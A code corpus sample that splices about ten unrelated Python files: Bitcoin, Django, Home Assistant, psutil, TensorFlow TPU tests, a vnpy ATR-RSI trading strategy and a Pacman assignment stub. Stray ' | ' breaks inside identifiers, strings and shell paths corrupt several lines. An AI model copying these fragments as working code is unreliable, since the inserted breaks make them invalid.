txid1 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[0].serialize_with_witness()), True)
test1txs.append(create_transaction(self.nodes[0], txid1, self.ms_address, amount=48))
txid2 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[1].serialize_with_witness()), True)
test1txs.append(create_transaction(self.nodes[0], coinbase_txid[1], self.wit_ms_address, amount=49))
txid3 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[2].serialize_with_witness()), True)
self.block_submit(self.nodes[0], test1txs, False, True)
self.log.info("Test 2: Non-NULLDUMMY base multisig transaction should not be accepted to mempool before activati | on")
test2tx = create_transaction(self.nodes[0], txid2, self.ms_address, amount=47)
trueDummy(test2tx)
| assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test2tx.serialize_with_witness()), True)
self.log.info("Test 3: Non-NULLDUMMY base transactions should be accepted in a block before activation [431]")
self.block_submit(self.nodes[0], [test2tx], False, True)
self.log.info("Test 4: Non-NULLDUMMY base multisig transaction is invalid after activation")
test4tx = create_transaction(self.nodes[0], test2tx.hash, self.address, amount=46)
test6txs=[CTransaction(test4tx)]
trueDummy(test4tx)
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test4tx.serialize_with_witness()), True)
self.block_submit(self.nodes[0], [test4tx])
self.log.info("Test 5: Non-NULLDUMMY P2WSH multisig transaction invalid after activation")
test5tx = create_transaction(self.nodes[0], txid3, self.wit_address, amount=48)
test6txs.append(CTransaction(test5tx))
test5tx.wit.vtxinwit[0].scriptWitness.stack[0] = b'\x01'
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test5tx.serialize_with_witness()), True)
self.block_submit(self.nodes[0], [test5tx], True)
self.log.info("Test 6: NULLDUMMY compliant base/witness transactions should be accepted to mempool and in block after activation [432]")
for i in test6txs:
self.nodes[0].sendrawtransaction(bytes_to_hex_str(i.serialize_with_witness()), True)
self.block_submit(self.nodes[0], test6txs, True, True)
def block_submit(self, node, txs, witness = False, accept = False):
block = create_block(self.tip, create_coinbase(self.lastblockheight + 1), self.lastblocktime + 1)
block.nVersion = 4
for tx in txs:
tx.rehash()
block.vtx.append(tx)
block.hashMerkleRoot = block.calc_merkle_root()
witness and add_witness_commitment(block)
block.rehash()
block.solve()
node.submitblock(bytes_to_hex_str(block.serialize(True)))
if (accept):
assert_equal(node.getbestblockhash(), block.hash)
self.tip = block.sha256
self.lastblockhash = block.hash
self.lastblocktime += 1
self.lastblockheight += 1
else:
assert_equal(node.getbestblockhash(), self.lastblockhash)
if __name__ == '__main__':
NULLDUMMYTest().main()
|
neosergio/hackatonqr | vote/models.py | Python | gpl-2.0 | 312 | 0.019231 | #-*- coding:utf-8 -*-
from django.db import models
# Create your models here.
class Candidate(models.Model):
name = models.CharField(max_length=250, verbose_name="Nombre de candid | ato")
votes = models.IntegerField(verbose_name="Cantidad de votos")
def __unicode__(self):
return | self.name + str(self.votes)
|
justyns/home-assistant | tests/components/test_weblink.py | Python | mit | 1,040 | 0 | """The tests for the weblink component."""
import unittest
from homeassistant.components import weblink
from tests.common import get_test_home_assistant
class TestComponentWeblink(unittest.TestCase) | :
"""Test the Weblink component."""
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
def tearDown(self):
"""Stop everything tha | t was started."""
self.hass.stop()
def test_entities_get_created(self):
"""Test if new entity is created."""
self.assertTrue(weblink.setup(self.hass, {
weblink.DOMAIN: {
'entities': [
{
weblink.ATTR_NAME: 'My router',
weblink.ATTR_URL: 'http://127.0.0.1/'
},
{}
]
}
}))
state = self.hass.states.get('weblink.my_router')
assert state is not None
assert state.state == 'http://127.0.0.1/'
|
zhu327/forum | forum/admin.py | Python | mit | 1,293 | 0.001547 | # coding=utf-8
from django.contrib import admin
from forum.models import ForumUser, Plane, Node, Topic, Reply, Favorite, Notification, Transaction, Vote
class ForumUserAdmin(admin.ModelAdmin):
list_display = ('username', 'email', 'is_active', 'is_staff', 'date_joined')
search_fields = ('username', 'email', 'nickname')
list_filter = ('is_active', 'is_staff', 'date_joined')
class PlaneAdmin(admin.ModelAdmin):
list_display = ('name', 'created')
search_fields = ('name',)
list_filter = ('created',)
class NodeAdmin(admin.ModelAdmin):
list_display = ('name', 'slug', 'created')
| search_fields = ('name',)
list_filter = ('created',)
class TopicAdmin(admin.ModelAdmin):
list_display = ('title', 'created')
search_fields = ('title', 'content')
list_filter = ('created',)
class ReplyAdmin(admin.ModelAdmin):
list_display = ('content', 'created')
search_fields = ('content',)
list_filter = ('created',)
admin.site.register(ForumUser, ForumUserAdmin)
admin.site.regi | ster(Plane, PlaneAdmin)
admin.site.register(Node, NodeAdmin)
admin.site.register(Topic, TopicAdmin)
admin.site.register(Reply, ReplyAdmin)
admin.site.register(Favorite)
admin.site.register(Notification)
admin.site.register(Transaction)
admin.site.register(Vote)
|
wanghongjuan/meta-iotqa-1 | lib/oeqa/runtime/sensor/test_accel_bma222e.py | Python | mit | 2,499 | 0.008003 | """
@file test_accel_bma222e.py
"""
##
# @addtogroup soletta sensor
# @brief This is sensor test based on soletta app
# @brief test sensor bma222e on Galileo/MinnowMax
##
import os
import time
from oeqa.utils.helper import shell_cmd
from oeqa.oetest import oeRuntimeTest
from oeqa.runtime.sensor.EnvirSetup import EnvirSetup
from oeqa.utils.decorators import tag
@tag(TestType="FVT", FeatureID="IOTOS-757")
class TestAccelBMA222E(oeRuntimeTest):
"""
@class TestAccelBMA222E
"""
def setUp(self):
'''Generate test app on target
@fn setUp
@param self
@return'''
print ('start!\n')
#connect sensor and DUT through board
#shell_cmd("sudo python "+ os.path.dirname(__file__) + "/Connector.py bma222e")
envir = EnvirSetup(self.target)
envir.envirSetup("bma222e","accel")
def tearDown(self):
'''unload bma222e driver
@fn tearDown
@param self
@return'''
(status, output) = self.target.run("cat /sys/devices/virtual/dmi/id/board_name")
if "Minnow" in output:
(status, output) = self.target.run(
"cd /sy | s/bus/i2c/devices; \
echo 0x19 >i2c-1/delete_device")
elif "Galileo" in output or "SDS" in output:
(status, output) = self.target.run(
"cd /sys/bus/i2c/devices; \
echo 0x19 >i2c-0/delete_device")
def test_Accel_BMA222E(self):
'''Execute the test app and verify sensor data
@fn test_Accel_BMA222E
@param self
@return'''
print ('start reading d | ata!')
(status, output) = self.target.run(
"chmod 777 /opt/apps/test_accel_bma222e.fbp")
(status, output) = self.target.run(
"cd /opt/apps; ./test_accel_bma222e.fbp >re.log")
error = output
#check whether data collected
(status, output) = self.target.run(
"cp /opt/apps/re.log /home/root/bma222e.log")
(status, output) = self.target.run("cat /opt/apps/re.log|grep direction-vector")
print (output + "\n")
self.assertEqual(status, 0, msg="Error messages: %s" % error)
#make sure sensor data is valid
(status, output) = self.target.run("cat /opt/apps/re.log|grep '0.000000, 0.000000, 0.000000'")
self.assertEqual(status, 1, msg="Error messages: %s" % output)
|
benjyw/pants | src/python/pants/base/exiter_integration_test.py | Python | apache-2.0 | 1,213 | 0.003303 | # Copyright 2018 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE). |
import os
from pants.testutil.pants_integration_test import ensure_daemon, run_pants, setup_tmpdir
dir_layout = {
# This file is expected to fail to "compile" when run via `./pants run` due to a SyntaxError.
# Because the error itself contains unicode, it can exercise that error handling codepaths
# are unicode aware.
os.path.join(
"exiter_integration_test_harness", "main.py"
): " | if __name__ == '__main__':\n import sys¡",
os.path.join(
"exiter_integration_test_harness", "BUILD"
): "python_library()\npex_binary(name='bin', entry_point='main.py')",
}
@ensure_daemon
def test_unicode_containing_exception(use_pantsd: bool) -> None:
with setup_tmpdir(dir_layout) as tmpdir:
pants_run = run_pants(
[
"--backend-packages=pants.backend.python",
"run",
os.path.join(tmpdir, "exiter_integration_test_harness", "main.py"),
],
use_pantsd=use_pantsd,
)
pants_run.assert_failure()
assert "import sys¡" in pants_run.stderr
|
lukesummer/vnpy | vn.trader/ctaAlgo/strategyAtrRsi.py | Python | mit | 9,927 | 0.004494 | # encoding: UTF-8
"""
一个ATR-RSI指标结合的交易策略,适合用在股指的1分钟和5分钟线上。
注意事项:
1. 作者不对交易盈利做任何保证,策略代码仅供参考
2. 本策略需要用到talib,没有安装的用户请先参考www.vnpy.org上的教程安装
3. 将IF0000_1min.csv用ctaHistoryData.py导入MongoDB后,直接运行本文件即可回测策略
"""
from ctaBase import *
from ctaTemplate import CtaTemplate
import talib
import numpy as np
########################################################################
class AtrRsiStrategy(CtaTemplate):
"""结合ATR和RSI指标的一个分钟线交易策略"""
className = 'AtrRsiStrategy'
author = u'用Python的交易员'
# 策略参数
atrLength = 22 # 计算ATR指标的窗口数
atrMaLength = 10 # 计算ATR均线的窗口数
rsiLength = 5 # 计算RSI的窗口数
rsiEntry = 16 # RSI的开仓信号
trailingPercent = 0.8 # 百分比移动止损
initDays = 10 # 初始化数据所用的天数
# 策略变量
bar = None # K线对象
barMinute = EMPTY_STRING # K线当前的分钟
bufferSize = 100 # 需要缓存的数据的大小
bufferCount = 0 # 目前已经缓存了的数据的计数
highArray = np.zeros(bufferSize) # K线最高价的数组
lowAr | ray = np.zeros(bufferSize) # K线最低价的数组
closeArray = np.zeros(bufferSize) # K线收盘价的数组
atrCount = 0 # 目前已经缓存了的ATR的计数
atrArray = np.z | eros(bufferSize) # ATR指标的数组
atrValue = 0 # 最新的ATR指标数值
atrMa = 0 # ATR移动平均的数值
rsiValue = 0 # RSI指标的数值
rsiBuy = 0 # RSI买开阈值
rsiSell = 0 # RSI卖开阈值
intraTradeHigh = 0 # 移动止损用的持仓期内最高价
intraTradeLow = 0 # 移动止损用的持仓期内最低价
orderList = [] # 保存委托代码的列表
# 参数列表,保存了参数的名称
paramList = ['name',
'className',
'author',
'vtSymbol',
'atrLength',
'atrMaLength',
'rsiLength',
'rsiEntry',
'trailingPercent']
# 变量列表,保存了变量的名称
varList = ['inited',
'trading',
'pos',
'atrValue',
'atrMa',
'rsiValue',
'rsiBuy',
'rsiSell']
#----------------------------------------------------------------------
def __init__(self, ctaEngine, setting):
"""Constructor"""
super(AtrRsiStrategy, self).__init__(ctaEngine, setting)
#----------------------------------------------------------------------
def onInit(self):
"""初始化策略(必须由用户继承实现)"""
self.writeCtaLog(u'%s策略初始化' %self.name)
# 初始化RSI入场阈值
self.rsiBuy = 50 + self.rsiEntry
self.rsiSell = 50 - self.rsiEntry
# 载入历史数据,并采用回放计算的方式初始化策略数值
initData = self.loadBar(self.initDays)
for bar in initData:
self.onBar(bar)
self.putEvent()
#----------------------------------------------------------------------
def onStart(self):
"""启动策略(必须由用户继承实现)"""
self.writeCtaLog(u'%s策略启动' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onStop(self):
"""停止策略(必须由用户继承实现)"""
self.writeCtaLog(u'%s策略停止' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onTick(self, tick):
"""收到行情TICK推送(必须由用户继承实现)"""
# 计算K线
tickMinute = tick.datetime.minute
if tickMinute != self.barMinute:
if self.bar:
self.onBar(self.bar)
bar = CtaBarData()
bar.vtSymbol = tick.vtSymbol
bar.symbol = tick.symbol
bar.exchange = tick.exchange
bar.open = tick.lastPrice
bar.high = tick.lastPrice
bar.low = tick.lastPrice
bar.close = tick.lastPrice
bar.date = tick.date
bar.time = tick.time
bar.datetime = tick.datetime # K线的时间设为第一个Tick的时间
self.bar = bar # 这种写法为了减少一层访问,加快速度
self.barMinute = tickMinute # 更新当前的分钟
else: # 否则继续累加新的K线
bar = self.bar # 写法同样为了加快速度
bar.high = max(bar.high, tick.lastPrice)
bar.low = min(bar.low, tick.lastPrice)
bar.close = tick.lastPrice
#----------------------------------------------------------------------
def onBar(self, bar):
"""收到Bar推送(必须由用户继承实现)"""
# 撤销之前发出的尚未成交的委托(包括限价单和停止单)
for orderID in self.orderList:
self.cancelOrder(orderID)
self.orderList = []
# 保存K线数据
self.closeArray[0:self.bufferSize-1] = self.closeArray[1:self.bufferSize]
self.highArray[0:self.bufferSize-1] = self.highArray[1:self.bufferSize]
self.lowArray[0:self.bufferSize-1] = self.lowArray[1:self.bufferSize]
self.closeArray[-1] = bar.close
self.highArray[-1] = bar.high
self.lowArray[-1] = bar.low
self.bufferCount += 1
if self.bufferCount < self.bufferSize:
return
# 计算指标数值
self.atrValue = talib.ATR(self.highArray,
self.lowArray,
self.closeArray,
self.atrLength)[-1]
self.atrArray[0:self.bufferSize-1] = self.atrArray[1:self.bufferSize]
self.atrArray[-1] = self.atrValue
self.atrCount += 1
if self.atrCount < self.bufferSize:
return
self.atrMa = talib.MA(self.atrArray,
self.atrMaLength)[-1]
self.rsiValue = talib.RSI(self.closeArray,
self.rsiLength)[-1]
# 判断是否要进行交易
# 当前无仓位
if self.pos == 0:
self.intraTradeHigh = bar.high
self.intraTradeLow = bar.low
# ATR数值上穿其移动平均线,说明行情短期内波动加大
# 即处于趋势的概率较大,适合CTA开仓
if self.atrValue > self.atrMa:
# 使用RSI指标的趋势行情时,会在超买超卖区钝化特征,作为开仓信号
if self.rsiValue > self.rsiBuy:
# 这里为了保证成交,选择超价5个整指数点下单
self.buy(bar.close+5, 1)
return
if self.rsiValue < self.rsiSell:
self.short(bar.close-5, 1)
return
# 持有多头仓位
if self.pos == 1:
# 计算多头持有期内的最高价,以及重置最低价
self.intraTradeHigh = max(self.intraTradeHigh, bar.high)
self.intraTradeLow = bar.low
# 计算多头移动止损
longStop = self.intraTradeHigh * (1-self.trailingPercent/100)
# 发出本地止损委托,并且把委托号记录下来,用于后续撤单
orderID = self.sell(longStop, 1, stop=True)
self.orderList.append(orderID)
return
# 持有空头仓位
if self.pos == -1:
self.intraTradeLow = min(self.intraTradeLow, bar.low)
self.intraTradeHigh = bar.high
shortStop = self.intraTradeLow * (1+self.trailingPercent/100)
orderID = self.cover(shortStop, 1, stop=True)
self.orderList.append(orderID)
return
# 发出状态更新事件
self.putEvent()
#----------------------------------------------------------------------
def onOrder(self, order):
"""收到委托变化推送(必须由用户继承实现)"""
pass
#----------------------------------------------------------------------
def onTrade(self, trade):
pass
if __name__ == '__main__':
# 提供直接双击回测的功能
# 导入PyQt4的包是为了保证matplotlib使用PyQt4而不是PySide,防止初始化出错
from ctaBacktesting import *
from PyQt4 import QtCore, QtGui
# 创建回测引擎
engine = BacktestingEngine()
# 设置引擎的回测模式为K线
engine.setBacktestingMode(engine.BAR_MODE)
# 设置回测用的数据起始日期
engine.setStartDate('20120101')
# 载入历史数据到引擎中
engine.loadHistoryData(MINUTE_DB_NAME, 'IF0000')
# 设置产品相关参数
engine.setSlippage(0.2) # 股指1跳
engine.setRate(0.3/10000) # 万0.3
engine.setSize(300) # 股指合约大小
# 在引擎中创建策略对象
engine.initStrategy(AtrRsiStrategy, {})
# 开始跑回测
engine.runBacktesting()
|
sumitb/cse537 | multiagent/multiAgents.py | Python | gpl-2.0 | 7,379 | 0.006234 | # multiAgents.py
# --------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to
# http://inst.eecs.berkeley.edu/~cs188/pacman/pacman.html
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
from util import manhattanDistance
from game import Directions
import random, util
from game import Agent
class ReflexAgent(Agent):
"""
A reflex agent chooses an action at each choice point by examining
its alternatives via a state evaluation function.
The code below is provided as a guide. You are welcome to change
it in any way you see fit, so long as you don't touch our method
headers.
"""
def getAction(self, gameState):
"""
You do not need to change this method, but you're welcome to.
getAction chooses among the best options according to the evaluation function.
Just like in the previous project, getAction takes a GameState and returns
some Directions.X for some X in the set {North, South, West, East, Stop}
"""
# Collect legal moves and successor states
legalMoves = gameState.getLegalActions()
# Choose one of the best actions
scores = [self.evaluationFunction(gameState, action) for action in legalMoves]
bestScore = max(scores)
bestIndices = [index for index in range(len(scores)) if scores[index] == bestScore]
chosenIndex = random.choice(bestIndices) # Pick randomly among the best
"Add more of your code here if you want to"
return legalMoves[chosenIndex]
def evaluationFunction(self, currentGameState, action):
"""
Design a better evaluation function here.
The evaluation function takes in the current and proposed successor
GameStates (pacman.py) and returns a number, where higher numbers are better.
The code below extracts some useful information from the state, like the
remaining food (newFood) and Pacman position after moving (newPos).
newScaredTimes holds the number of moves that each ghost will remain
scared because of Pacman having eaten a power pellet.
Print out these variables to see what you're getting, then combine them
to create a masterful evaluation function.
"""
# Useful information you can extract from a GameState (pacman.py)
successorGameState = currentGameState.generatePacmanSuccessor(action)
newPos = successorGameState.getPacmanPosition()
newFood = successorGameState.getFood()
newGhostStates = successorGameState.getGhostStates()
newScaredTimes = [ghostState.scaredTimer for ghostState in newGhostStates]
"*** YOUR CODE HERE ***"
ghost = str(newGhostStates[0])
ghost = ghost[ghost.find('=') + 1 : ghost.rfind(',')]
ghost = ghost.replace(".0", "")
#print newPos, newGhostStates[0]
if str(newPos) == ghost:
return -10
if newFood[newPos[0]][newPos[1]]:
return 3
if newScaredTimes[0] > 0:
return 10
return successorGameState.getScore()
def scoreEvaluationFunction(currentGameState):
"""
This default evaluation function just returns the score of the state.
The score is the same one displayed in the Pacman GUI.
This evaluation function is meant for use with adversarial search agents
(not reflex agents).
"""
return currentGameState.getScore()
class MultiAgentSearchAgent(Agent):
"""
This class provides some common elements to all of your
multi-agent searchers. Any methods defined here will be available
to the MinimaxPacmanAgent, AlphaBetaPacmanAgent & ExpectimaxPacmanAgent.
You *do not* need to make any changes here, but you can if you want to
add functionality to all your adversarial search agents. Please do not
remove anything, however.
Note: this is an abstract class: one that should not be instantiated. It's
only partially specified, and designed to be extended. Agent (game.py)
is another abstract class.
"""
def __init__(self, evalFn = 'scoreEvaluationFunction', depth = '2'):
self.index = 0 # Pacman is always agent index 0
self.evaluationFunction = util.lookup(evalFn, globals())
self.depth = int(depth)
class MinimaxAgent(MultiAgentSearchAgent) | :
"""
Your m | inimax agent (question 2)
"""
def getAction(self, gameState):
"""
Returns the minimax action from the current gameState using self.depth
and self.evaluationFunction.
Here are some method calls that might be useful when implementing minimax.
gameState.getLegalActions(agentIndex):
Returns a list of legal actions for an agent
agentIndex=0 means Pacman, ghosts are >= 1
gameState.generateSuccessor(agentIndex, action):
Returns the successor game state after an agent takes an action
gameState.getNumAgents():
Returns the total number of agents in the game
"""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
class AlphaBetaAgent(MultiAgentSearchAgent):
"""
Your minimax agent with alpha-beta pruning (question 3)
"""
def getAction(self, gameState):
"""
Returns the minimax action using self.depth and self.evaluationFunction
"""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
class ExpectimaxAgent(MultiAgentSearchAgent):
"""
Your expectimax agent (question 4)
"""
def getAction(self, gameState):
"""
Returns the expectimax action using self.depth and self.evaluationFunction
All ghosts should be modeled as choosing uniformly at random from their
legal moves.
"""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
def betterEvaluationFunction(currentGameState):
"""
Your extreme ghost-hunting, pellet-nabbing, food-gobbling, unstoppable
evaluation function (question 5).
DESCRIPTION: <write something here so we know what you did>
"""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
# Abbreviation
better = betterEvaluationFunction
class ContestAgent(MultiAgentSearchAgent):
"""
Your agent for the mini-contest
"""
def getAction(self, gameState):
"""
Returns an action. You can use any method you want and search to any depth you want.
Just remember that the mini-contest is timed, so you have to trade off speed and computation.
Ghosts don't behave randomly anymore, but they aren't perfect either -- they'll usually
just make a beeline straight towards Pacman (or away from him if they're scared!)
"""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
|
0-wiz-0/psutil | psutil/tests/test_linux.py | Python | bsd-3-clause | 27,328 | 0.00022 | #!/usr/bin/env python
# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Linux specific tests."""
import contextlib
import errno
import io
import os
import pprint
import re
import shutil
import socket
import struct
import tempfile
import textwrap
import time
import warnings
try:
from unittest import mock # py3
except ImportError:
import mock # requires "pip install mock"
import psutil
from psutil import LINUX
from psutil._compat import PY3
from psutil._compat import u
from psutil.tests import call_until
from psutil.tests import get_kernel_version
from psutil.tests import importlib
from psutil.tests import MEMORY_TOLERANCE
from psutil.tests import pyrun
from psutil.tests import reap_children
from psutil.tests import retry_before_failing
from psutil.tests import run_test_module_by_name
from psutil.tests import sh
from psutil.tests import skip_on_not_implemented
from psutil.tests import TESTFN
from psutil.tests import TRAVIS
from psutil.tests import unittest
from psutil.tests import which
HERE = os.path.abspath(os.path.dirname(__file__))
SIOCGIFADDR = 0x8915
SIOCGIFCONF = 0x8912
SIOCGIFHWADDR = 0x8927
# =====================================================================
# utils
# =====================================================================
def get_ipv4_address(ifname):
import fcntl
ifname = ifname[:15]
if PY3:
ifname = bytes(ifname, 'ascii')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with contex | tlib.clo | sing(s):
return socket.inet_ntoa(
fcntl.ioctl(s.fileno(),
SIOCGIFADDR,
struct.pack('256s', ifname))[20:24])
def get_mac_address(ifname):
import fcntl
ifname = ifname[:15]
if PY3:
ifname = bytes(ifname, 'ascii')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with contextlib.closing(s):
info = fcntl.ioctl(
s.fileno(), SIOCGIFHWADDR, struct.pack('256s', ifname))
if PY3:
def ord(x):
return x
else:
import __builtin__
ord = __builtin__.ord
return ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
def free_swap():
"""Parse 'free' cmd and return swap memory's s total, used and free
values.
"""
lines = sh('free').split('\n')
for line in lines:
if line.startswith('Swap'):
_, total, used, free = line.split()
return (int(total) * 1024, int(used) * 1024, int(free) * 1024)
def free_physmem():
"""Parse 'free' cmd and return physical memory's total, used
and free values.
"""
lines = sh('free').split('\n')
for line in lines:
if line.startswith('Mem'):
total, used, free, shared, buffers, cached = \
[int(x) * 1024 for x in line.split()[1:]]
return (total, used, free, shared, buffers, cached)
# =====================================================================
# system memory
# =====================================================================
@unittest.skipUnless(LINUX, "not a Linux system")
class TestSystemMemory(unittest.TestCase):
def test_vmem_total(self):
total, used, free, shared, buffers, cached = free_physmem()
self.assertEqual(total, psutil.virtual_memory().total)
@retry_before_failing()
def test_vmem_used(self):
total, used, free, shared, buffers, cached = free_physmem()
self.assertAlmostEqual(used, psutil.virtual_memory().used,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_vmem_free(self):
total, used, free, shared, buffers, cached = free_physmem()
self.assertAlmostEqual(free, psutil.virtual_memory().free,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_vmem_buffers(self):
buffers = int(sh('vmstat').split('\n')[2].split()[4]) * 1024
self.assertAlmostEqual(buffers, psutil.virtual_memory().buffers,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_vmem_cached(self):
cached = int(sh('vmstat').split('\n')[2].split()[5]) * 1024
self.assertAlmostEqual(cached, psutil.virtual_memory().cached,
delta=MEMORY_TOLERANCE)
def test_swapmem_total(self):
total, used, free = free_swap()
return self.assertAlmostEqual(total, psutil.swap_memory().total,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_swapmem_used(self):
total, used, free = free_swap()
return self.assertAlmostEqual(used, psutil.swap_memory().used,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_swapmem_free(self):
total, used, free = free_swap()
return self.assertAlmostEqual(free, psutil.swap_memory().free,
delta=MEMORY_TOLERANCE)
# --- mocked tests
def test_virtual_memory_mocked_warnings(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
ret = psutil._pslinux.virtual_memory()
assert m.called
self.assertEqual(len(ws), 1)
w = ws[0]
self.assertTrue(w.filename.endswith('psutil/_pslinux.py'))
self.assertIn(
"'cached', 'active' and 'inactive' memory stats couldn't "
"be determined", str(w.message))
self.assertEqual(ret.cached, 0)
self.assertEqual(ret.active, 0)
self.assertEqual(ret.inactive, 0)
def test_swap_memory_mocked_warnings(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
ret = psutil._pslinux.swap_memory()
assert m.called
self.assertEqual(len(ws), 1)
w = ws[0]
self.assertTrue(w.filename.endswith('psutil/_pslinux.py'))
self.assertIn(
"'sin' and 'sout' swap memory stats couldn't "
"be determined", str(w.message))
self.assertEqual(ret.sin, 0)
self.assertEqual(ret.sout, 0)
def test_swap_memory_mocked_no_vmstat(self):
# see https://github.com/giampaolo/psutil/issues/722
with mock.patch('psutil._pslinux.open', create=True,
side_effect=IOError) as m:
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
ret = psutil.swap_memory()
assert m.called
self.assertEqual(len(ws), 1)
w = ws[0]
self.assertTrue(w.filename.endswith('psutil/_pslinux.py'))
self.assertIn(
"'sin' and 'sout' swap memory stats couldn't "
"be determined and were set to 0",
str(w.message))
self.assertEqual(ret.sin, 0)
self.assertEqual(ret.sout, 0)
# =====================================================================
# system CPU
# =====================================================================
@unittest.skipUnless(LINUX, "not a Linux system")
class TestSystemCPU(unittest.TestCase):
@unittest.skipIf(TRAVIS, "unknown failure on travis")
def test_cpu_times(self):
fields = psutil.cpu_times()._fields
kernel_ver = re.findall('\d+\.\d+\.\d+', os.uname()[2])[0]
kernel_ver_info = tuple(map(int, kernel_ver.split('.')))
if kernel_ver_info >= (2, 6, 11):
self.assertIn('steal', fields)
else:
self.assertNotIn('steal', fields)
if kernel_ver_info >= (2, 6, 24):
self.assertIn('g |
tensorflow/tensorflow | tensorflow/python/tpu/tpu_embedding_v2_utils_test.py | Python | apache-2.0 | 4,791 | 0.004174 | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======================================================= | =======================
"""Tests for TPU Embeddings mid level API utils on TPU."""
from absl.testing import parameterized
from tensorflow.core.protobuf.tpu import tpu_embedding_configuration_pb2
from tensorflow.python.compat import v2_compat
from tensorflo | w.python.platform import test
from tensorflow.python.tpu import tpu_embedding_v2_utils
class TPUEmbeddingOptimizerTest(parameterized.TestCase, test.TestCase):
@parameterized.parameters(tpu_embedding_v2_utils.Adagrad,
tpu_embedding_v2_utils.Adam,
tpu_embedding_v2_utils.FTRL)
def test_grad_clip_with_accumulation_off(self, optimizer):
with self.assertRaisesRegex(ValueError, 'accumulation'):
optimizer(use_gradient_accumulation=False, clipvalue=0.)
with self.assertRaisesRegex(ValueError, 'accumulation'):
optimizer(use_gradient_accumulation=False, clipvalue=(None, 1.))
@parameterized.parameters(tpu_embedding_v2_utils.SGD,
tpu_embedding_v2_utils.Adagrad,
tpu_embedding_v2_utils.Adam,
tpu_embedding_v2_utils.FTRL)
def test_grad_clip_with_tuple(self, optimizer):
opt = optimizer(clipvalue=(-1., 1.))
self.assertEqual(-1., opt.clip_gradient_min)
self.assertEqual(1., opt.clip_gradient_max)
@parameterized.parameters(tpu_embedding_v2_utils.SGD,
tpu_embedding_v2_utils.Adagrad,
tpu_embedding_v2_utils.Adam,
tpu_embedding_v2_utils.FTRL)
def test_grad_clip_with_single_value(self, optimizer):
opt = optimizer(clipvalue=1.)
self.assertEqual(-1., opt.clip_gradient_min)
self.assertEqual(1., opt.clip_gradient_max)
@parameterized.parameters(tpu_embedding_v2_utils.SGD,
tpu_embedding_v2_utils.Adagrad,
tpu_embedding_v2_utils.Adam,
tpu_embedding_v2_utils.FTRL)
def test_grad_clip_with_tuple_and_none(self, optimizer):
opt = optimizer(clipvalue=(None, 1))
self.assertIsNone(opt.clip_gradient_min)
self.assertEqual(1., opt.clip_gradient_max)
class ConfigTest(test.TestCase):
def test_table_config_repr(self):
table = tpu_embedding_v2_utils.TableConfig(
vocabulary_size=2, dim=4,
combiner='sum', name='table')
self.assertEqual(
repr(table),
'TableConfig(vocabulary_size=2, dim=4, initializer=None, '
'optimizer=None, combiner=\'sum\', name=\'table\')')
def test_feature_config_repr(self):
table = tpu_embedding_v2_utils.TableConfig(
vocabulary_size=2, dim=4, initializer=None,
combiner='sum', name='table')
feature_config = tpu_embedding_v2_utils.FeatureConfig(
table=table, name='feature')
self.assertEqual(
repr(feature_config),
'FeatureConfig(table=TableConfig(vocabulary_size=2, dim=4, '
'initializer=None, optimizer=None, combiner=\'sum\', name=\'table\'), '
'max_sequence_length=0, validate_weights_and_indices=True, '
'name=\'feature\')')
class TPUEmbeddingConfigurationTest(test.TestCase):
def test_no_truncate(self):
truncate_length = 14937 # Experimentally maximum string length loggable.
config = tpu_embedding_configuration_pb2.TPUEmbeddingConfiguration()
for i in range(500):
td = config.table_descriptor.add()
td.name = 'table_{}'.format(i)
td.vocabulary_size = i
config.num_hosts = 2
config.num_tensor_cores = 4
config.batch_size_per_tensor_core = 128
self.assertGreater(
len(str(config)), truncate_length,
'Test sanity check: generated config should be of truncating length.')
with self.assertLogs() as logs:
tpu_embedding_v2_utils.log_tpu_embedding_configuration(config)
self.assertIn('table_499', ''.join(logs.output))
